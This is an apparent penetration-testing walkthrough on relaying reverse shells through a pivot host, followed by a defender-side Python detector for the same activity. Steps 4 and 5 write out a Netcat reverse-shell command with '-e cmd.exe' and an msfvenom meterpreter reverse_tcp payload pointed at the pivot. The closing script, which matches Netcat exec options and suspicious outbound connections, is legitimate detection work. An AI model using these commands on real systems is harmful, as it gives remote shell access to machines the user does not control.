Setup Reverse Shells through Pivot

Here's how to set up a Netcat listener on your attacking machine and expose it through a pivot host so that targets on the internal network can reach it, using Netcat, the pivot's listener_add forwarding command, and Metasploit:


Step 1: Set Up the Netcat Listener

First, you need to set up a Netcat listener on your local machine (Kali) to accept incoming connections.

  1. Start Netcat Listener:

    nc -nvlp 2222

    This command will listen on port 2222 on your local machine.


Step 2: Add a Forwarding Listener on the Pivot

Now, on the pivot, add a listener that forwards any connection arriving on a different port (e.g., port 1234) to port 2222 on your local machine.

  1. Listener Add Command:

    listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:2222
    • This command tells the pivot to accept connections on port 1234 and forward them to your local (Kali) machine on 127.0.0.1:2222, where Netcat is listening.

    You should see a message confirming the listener is set up and active.


Step 3: Verify the Listener is Active

You can check if the listener is active by running the following command:

  1. Check Active Listeners:

    listener_list

    This will show you the listeners that are currently active. You should see the listener set up in the previous step.


Step 4: Testing the Listener with Netcat

Now, to test that the listener works, you can attempt a connection from a remote machine (e.g., client01) using Netcat:

  1. Connect Back to the Listener through the Pivot: On the target machine (e.g., client01), use the following Netcat command to connect to your pivot machine on port 1234; the pivot forwards the traffic to localhost:2222 on your Kali machine.

    nc.exe -nv 10.10.120.131 1234 -e cmd.exe
    • 10.10.120.131 is the IP address of your pivot machine.

    • Port 1234 on the pivot is forwarded to localhost:2222 on your attacking machine.

    • The -e cmd.exe option executes cmd.exe on the target machine and attaches it to the connection, giving you a shell in your Netcat listener. Note that not every Netcat build supports -e; the command above assumes one that does.


Step 5: Using Metasploit for Reverse Shell

To automate this process or use a reverse shell, you can use Metasploit to generate a payload that will connect back to your pivot machine's IP.

  1. Generate a Reverse Shell with Metasploit:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.76.14 LPORT=1234 -f exe -o shell2.exe
    • LHOST=172.16.76.14 is the IP address of your pivot machine.

    • LPORT=1234 is the port you're forwarding traffic to.

    • -o shell2.exe specifies the output filename.

  2. Execute the Payload: After transferring and executing shell2.exe on the target machine, it will establish a reverse shell connection back to your listener on port 1234, which is forwarded to localhost:2222.
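The two commands in Steps 4 and 5 leave characteristic traces on the target host, so as an added example (not part of these notes and not from any tool they mention) here is a small defender-side detector. It scans constructed process-creation and network-connection events for the two patterns the steps above rely on: a Netcat-family binary launched with an exec option (-e cmd.exe), and an executable running from a user-writable directory that opens an outbound connection to an uncommon port, which is how shell2.exe behaves when it calls back to LHOST:LPORT. The event schema, hostnames, usernames and paths are assumptions made up for the example; the addresses mirror the ones used in the notes.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (Sysmon-style process and network events).
# Hosts, users, paths and the external address are made up for this example;
# the pivot/LHOST addresses and ports are the ones used in the notes above.
SAMPLE_EVENTS = [
    {"type": "process", "host": "client01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"type": "process", "host": "client01", "image": r"C:\Users\alice\Downloads\nc.exe",
     "cmdline": "nc.exe -nv 10.10.120.131 1234 -e cmd.exe"},
    {"type": "process", "host": "client01", "image": r"C:\Users\alice\Downloads\shell2.exe",
     "cmdline": "shell2.exe"},
    {"type": "network", "host": "client01", "image": r"C:\Users\alice\Downloads\shell2.exe",
     "dst_ip": "172.16.76.14", "dst_port": 1234},
    {"type": "network", "host": "client01", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    {"type": "network", "host": "fileserver", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "10.10.120.131", "dst_port": 445},
]


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


# Binary names of the Netcat family commonly seen on Windows hosts.
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}

# Options that attach a program to the socket (nc -e / -c, ncat --exec / --sh-exec).
EXEC_OPTION_RE = re.compile(r"(?:^|\s)(?:-e|-c|--exec|--sh-exec)\s+\S+")

# Directories an unprivileged user can write to; a binary launched from here
# that talks to arbitrary ports deserves a closer look.
USER_WRITABLE_RE = re.compile(
    r"^C:\\Users\\[^\\]+\\(?:Downloads|AppData|Desktop|Documents)\\", re.IGNORECASE)

# Ports where outbound traffic from a workstation is routinely expected;
# anything else from a user-directory binary is flagged (tune for your estate).
COMMON_PORTS = {22, 25, 53, 80, 88, 135, 139, 389, 443, 445, 587, 636, 993, 3389}


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """Flag a Netcat-family process started with an exec option (Step 4 pattern)."""
    cmd = ev["cmdline"]
    looks_like_nc = basename(ev["image"]) in NETCAT_NAMES or basename(cmd.split()[0]) in NETCAT_NAMES
    if looks_like_nc and EXEC_OPTION_RE.search(cmd):
        return Finding(ev["host"], "netcat_exec_shell", cmd)
    return None


def check_network(ev):
    """Flag a user-directory binary connecting out to an uncommon port (Step 5 pattern)."""
    if USER_WRITABLE_RE.match(ev["image"]) and ev["dst_port"] not in COMMON_PORTS:
        detail = f'{basename(ev["image"])} -> {ev["dst_ip"]}:{ev["dst_port"]}'
        return Finding(ev["host"], "user_dir_binary_uncommon_port", detail)
    return None


def scan(events):
    """Run both rules over a list of events and return the findings in event order."""
    findings = []
    for ev in events:
        finding = check_process(ev) if ev["type"] == "process" else check_network(ev)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the constructed events it reports exactly two findings: the nc.exe launch with -e cmd.exe on client01, and shell2.exe (running from Downloads) connecting to 172.16.76.14:1234. The notepad, firefox and svchost events pass through untouched, which is the point of keying the second rule on both the image location and the port rather than on either alone.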

